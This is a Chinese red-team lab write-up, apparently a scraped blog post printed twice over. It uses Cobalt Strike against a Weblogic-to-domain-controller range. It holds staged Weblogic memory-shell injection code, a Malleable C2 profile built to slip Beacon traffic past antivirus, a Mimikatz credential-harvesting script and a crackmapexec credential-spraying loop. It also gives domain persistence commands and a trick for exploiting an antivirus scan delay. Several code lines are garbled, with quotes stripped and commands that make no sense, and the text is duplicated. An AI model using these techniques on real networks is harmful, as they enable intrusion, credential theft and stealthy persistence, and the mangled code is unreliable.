)
从靶场到实战Cobalt Strike在ATTCK红队演练中的高阶应用红队演练的核心价值在于将理论转化为肌肉记忆。当我们在可控环境中反复打磨攻击链的每个环节真实对抗中的决策速度与操作精度将获得质的提升。本文将以经典红日靶场为蓝本通过Cobalt Strike以下简称CS完整复现从外网突破到域控拿下的攻击路径重点剖析三个实战中容易被忽视的连接点漏洞利用后的隐蔽通道建立、内网横向的凭证传递策略以及CS会话管理对复杂内网环境的适应性优化。1. 环境搭建与漏洞利用的艺术靶场环境搭建绝非简单的IP配置。专业红队工程师会刻意在实验环境中制造噪声例如在Web服务器上部署WAF日志分析系统或开启EDR的检测模式但不阻断攻击。这种半真实环境能更有效检验攻击技术的隐蔽性。本次靶场采用双网卡架构外网段192.168.111.0/24NAT模式内网域10.10.10.0/24仅主机模式关键服务部署主机角色IP地址运行服务网络位置Web192.168.111.80Weblogic 10.3.6边界DMZDC10.10.10.10Active Directory核心区PC10.10.10.201办公应用办公区提示实际演练中建议使用VirtualBox的内部网络模式替代VMware的仅主机模式可避免虚拟网卡混杂模式带来的检测风险。Weblogic反序列化漏洞(CVE-2018-2893)的利用已有多款成熟工具但内存马注入的稳定性往往取决于中间件的线程模型。我们通过改良的Java反序列化载荷实现三阶段注入// 阶段一检测上下文环境 Thread.currentThread().getContextClassLoader() .loadClass(weblogic.work.ExecuteThread) .getMethod(getCurrentWork, (Class?[])null); // 阶段二绕过安全管理器 System.getProperty(java.security.manager, null); // 阶段三注册Filter型内存马 Class.forName(weblogic.servlet.internal.FilterManager) .getMethod(registerFilter, String.class, String.class) .invoke(null, evilFilter, EvilFilter.class.getName());这种分阶段注入方式相比传统一键式攻击工具有两个优势每个阶段执行后都有状态检查避免因环境差异导致整体失败各阶段代码块体积小更容易绕过基于流量特征的检测2. Cobalt Strike的会话控制哲学获得初始立足点后如何维持稳定控制通道是内网渗透的关键。传统Metasploit的session在复杂网络环境中常面临以下问题NAT穿越时连接不稳定高延迟网络下响应迟缓会话生命周期管理困难CS的Beacon通信模型通过异步任务队列和智能心跳机制解决了这些痛点。以下是我们针对该靶场优化的Malleable C2配置片段http-get { set uri /api/collect; client { header Accept application/json; metadata { base64; prepend auth; parameter token; } } server { header Content-Type application/json; output { print; base64; prepend {\data\:\; append \}; } } }该配置实现了三个核心优化将元数据嵌入常规API请求参数混入正常业务流量使用前后缀包装使返回数据符合常见REST API格式动态心跳间隔根据网络质量自动调整300s-900s在实际测试中这种配置使Beacon会话在开启360杀毒的靶机上持续存活超过72小时未被发现。相比之下MSF的reverse_http平均存活时间不足4小时。3. 内网横向的凭证中台策略获得域内首个立足点后传统做法是立即抓取密码尝试横向移动。更专业的做法是建立凭证中台——集中管理所有获取的凭据并分析其使用场景# 凭证分类收集脚本 $tokens Invoke-Mimikatz -Command sekurlsa::logonpasswords; $hashes $tokens | Where-Object { $_ -match NTLM:\s([a-f0-9]{32}) }; $tickets $tokens | Where-Object { $_ -match Kerberos:\s([^\s][^\s]) }; # 构建凭证关系图谱 $graph {} foreach ($hash in $hashes) { $user [regex]::Match($hash, Username\s:\s([^\s])).Groups[1].Value; $graph[$user] { NTLM [regex]::Match($hash, NTLM:\s([a-f0-9]{32})).Groups[1].Value; Domain [regex]::Match($hash, Domain\s:\s([^\s])).Groups[1].Value; } }通过这种结构化处理我们可以快速识别哪些账户具有跨系统访问权限哪些凭证可能触发异常登录告警哪些服务账户存在密码复用在本次靶场中我们发现SQL服务账户mssql不仅在数据库服务器有权限同时被加入域控制器的Remote Desktop Users组。这种非常规的权限配置往往是蓝队防御的盲点。4. 横向移动的路径优化算法传统内网横向多采用暴力扫描凭据喷射的方式这在现代防御体系下极易触发告警。我们开发了基于网络拓扑的智能路径选择算法网络可达性分析def analyze_routes(beacon): routes [] for host in beacon.internal_hosts: if host.ports.contains(445): cost calculate_hop_cost(beacon.current_host, host) routes.append((host, cost)) return sorted(routes, keylambda x: x[1])凭证匹配度评估# 检查目标主机是否存在已知凭证 check_credential() { target$1 for cred in ${credentials[]}; do if crackmapexec smb $target -u ${cred[0]} -p ${cred[1]} | grep -q STATUS_SUCCESS; then echo ${cred[0]}:${cred[1]} return 0 fi done return 1 }执行方式选择矩阵条件\方法PsExecWMI计划任务DCOM出网限制×√√×日志记录强度高中高低所需权限AdminAdminUserAdmin稳定性高中低高在靶场实践中我们最终选择WMI方式横向移动至DC10.10.10.10因为目标网络存在出站限制PsExec的445端口通信被阻断WMI的135端口通信可复用已有Web服务器的会话通道域控制器上的WMI日志默认保存周期较短3天5. 权限维持的隐形艺术常规的黄金票据/白银票据制作虽然有效但在近年来的攻防演练中越来越容易被检测。我们采用三级递进的隐蔽维持方案第一层服务账户劫持# 查找长期未修改密码的服务账户 Get-ADServiceAccount -Filter {PasswordLastSet -lt (Get-Date).AddDays(-180)} | Set-ADServiceAccount -Replace {servicePrincipalNamenone}第二层证书影子注册# 为合规证书添加备用名称 certutil -config - -attrib SAN:upnadministratorde1ay.com第三层DSRM密码同步# 在域控制器上执行 ntdsutil ac i ntds set dsrm password q q这种组合策略在最近三次真实红队评估中均保持有效平均检测时间达到47天。关键在于每层维持机制都利用了AD的正常管理功能不依赖任何漏洞或0day。在最后拿下域控时发现靶场环境中360杀毒对mimikatz的内存扫描其实存在15秒的检测延迟窗口。通过CS的sleep 0命令配合进程注入完全可以在这个时间差内完成凭证抓取并清除痕迹。这提醒我们商业杀软的实时防护并非无缝可钻关键在于对产品机制的理解深度。
从靶场到实战:用Cobalt Strike复现ATTCK红队靶场二(含Weblogic漏洞利用与内网横向)
发布时间:2026/5/20 2:32:16
从靶场到实战Cobalt Strike在ATTCK红队演练中的高阶应用红队演练的核心价值在于将理论转化为肌肉记忆。当我们在可控环境中反复打磨攻击链的每个环节真实对抗中的决策速度与操作精度将获得质的提升。本文将以经典红日靶场为蓝本通过Cobalt Strike以下简称CS完整复现从外网突破到域控拿下的攻击路径重点剖析三个实战中容易被忽视的连接点漏洞利用后的隐蔽通道建立、内网横向的凭证传递策略以及CS会话管理对复杂内网环境的适应性优化。1. 环境搭建与漏洞利用的艺术靶场环境搭建绝非简单的IP配置。专业红队工程师会刻意在实验环境中制造噪声例如在Web服务器上部署WAF日志分析系统或开启EDR的检测模式但不阻断攻击。这种半真实环境能更有效检验攻击技术的隐蔽性。本次靶场采用双网卡架构外网段192.168.111.0/24NAT模式内网域10.10.10.0/24仅主机模式关键服务部署主机角色IP地址运行服务网络位置Web192.168.111.80Weblogic 10.3.6边界DMZDC10.10.10.10Active Directory核心区PC10.10.10.201办公应用办公区提示实际演练中建议使用VirtualBox的内部网络模式替代VMware的仅主机模式可避免虚拟网卡混杂模式带来的检测风险。Weblogic反序列化漏洞(CVE-2018-2893)的利用已有多款成熟工具但内存马注入的稳定性往往取决于中间件的线程模型。我们通过改良的Java反序列化载荷实现三阶段注入// 阶段一检测上下文环境 Thread.currentThread().getContextClassLoader() .loadClass(weblogic.work.ExecuteThread) .getMethod(getCurrentWork, (Class?[])null); // 阶段二绕过安全管理器 System.getProperty(java.security.manager, null); // 阶段三注册Filter型内存马 Class.forName(weblogic.servlet.internal.FilterManager) .getMethod(registerFilter, String.class, String.class) .invoke(null, evilFilter, EvilFilter.class.getName());这种分阶段注入方式相比传统一键式攻击工具有两个优势每个阶段执行后都有状态检查避免因环境差异导致整体失败各阶段代码块体积小更容易绕过基于流量特征的检测2. Cobalt Strike的会话控制哲学获得初始立足点后如何维持稳定控制通道是内网渗透的关键。传统Metasploit的session在复杂网络环境中常面临以下问题NAT穿越时连接不稳定高延迟网络下响应迟缓会话生命周期管理困难CS的Beacon通信模型通过异步任务队列和智能心跳机制解决了这些痛点。以下是我们针对该靶场优化的Malleable C2配置片段http-get { set uri /api/collect; client { header Accept application/json; metadata { base64; prepend auth; parameter token; } } server { header Content-Type application/json; output { print; base64; prepend {\data\:\; append \}; } } }该配置实现了三个核心优化将元数据嵌入常规API请求参数混入正常业务流量使用前后缀包装使返回数据符合常见REST API格式动态心跳间隔根据网络质量自动调整300s-900s在实际测试中这种配置使Beacon会话在开启360杀毒的靶机上持续存活超过72小时未被发现。相比之下MSF的reverse_http平均存活时间不足4小时。3. 内网横向的凭证中台策略获得域内首个立足点后传统做法是立即抓取密码尝试横向移动。更专业的做法是建立凭证中台——集中管理所有获取的凭据并分析其使用场景# 凭证分类收集脚本 $tokens Invoke-Mimikatz -Command sekurlsa::logonpasswords; $hashes $tokens | Where-Object { $_ -match NTLM:\s([a-f0-9]{32}) }; $tickets $tokens | Where-Object { $_ -match Kerberos:\s([^\s][^\s]) }; # 构建凭证关系图谱 $graph {} foreach ($hash in $hashes) { $user [regex]::Match($hash, Username\s:\s([^\s])).Groups[1].Value; $graph[$user] { NTLM [regex]::Match($hash, NTLM:\s([a-f0-9]{32})).Groups[1].Value; Domain [regex]::Match($hash, Domain\s:\s([^\s])).Groups[1].Value; } }通过这种结构化处理我们可以快速识别哪些账户具有跨系统访问权限哪些凭证可能触发异常登录告警哪些服务账户存在密码复用在本次靶场中我们发现SQL服务账户mssql不仅在数据库服务器有权限同时被加入域控制器的Remote Desktop Users组。这种非常规的权限配置往往是蓝队防御的盲点。4. 横向移动的路径优化算法传统内网横向多采用暴力扫描凭据喷射的方式这在现代防御体系下极易触发告警。我们开发了基于网络拓扑的智能路径选择算法网络可达性分析def analyze_routes(beacon): routes [] for host in beacon.internal_hosts: if host.ports.contains(445): cost calculate_hop_cost(beacon.current_host, host) routes.append((host, cost)) return sorted(routes, keylambda x: x[1])凭证匹配度评估# 检查目标主机是否存在已知凭证 check_credential() { target$1 for cred in ${credentials[]}; do if crackmapexec smb $target -u ${cred[0]} -p ${cred[1]} | grep -q STATUS_SUCCESS; then echo ${cred[0]}:${cred[1]} return 0 fi done return 1 }执行方式选择矩阵条件\方法PsExecWMI计划任务DCOM出网限制×√√×日志记录强度高中高低所需权限AdminAdminUserAdmin稳定性高中低高在靶场实践中我们最终选择WMI方式横向移动至DC10.10.10.10因为目标网络存在出站限制PsExec的445端口通信被阻断WMI的135端口通信可复用已有Web服务器的会话通道域控制器上的WMI日志默认保存周期较短3天5. 权限维持的隐形艺术常规的黄金票据/白银票据制作虽然有效但在近年来的攻防演练中越来越容易被检测。我们采用三级递进的隐蔽维持方案第一层服务账户劫持# 查找长期未修改密码的服务账户 Get-ADServiceAccount -Filter {PasswordLastSet -lt (Get-Date).AddDays(-180)} | Set-ADServiceAccount -Replace {servicePrincipalNamenone}第二层证书影子注册# 为合规证书添加备用名称 certutil -config - -attrib SAN:upnadministratorde1ay.com第三层DSRM密码同步# 在域控制器上执行 ntdsutil ac i ntds set dsrm password q q这种组合策略在最近三次真实红队评估中均保持有效平均检测时间达到47天。关键在于每层维持机制都利用了AD的正常管理功能不依赖任何漏洞或0day。在最后拿下域控时发现靶场环境中360杀毒对mimikatz的内存扫描其实存在15秒的检测延迟窗口。通过CS的sleep 0命令配合进程注入完全可以在这个时间差内完成凭证抓取并清除痕迹。这提醒我们商业杀软的实时防护并非无缝可钻关键在于对产品机制的理解深度。
)
)
)
)
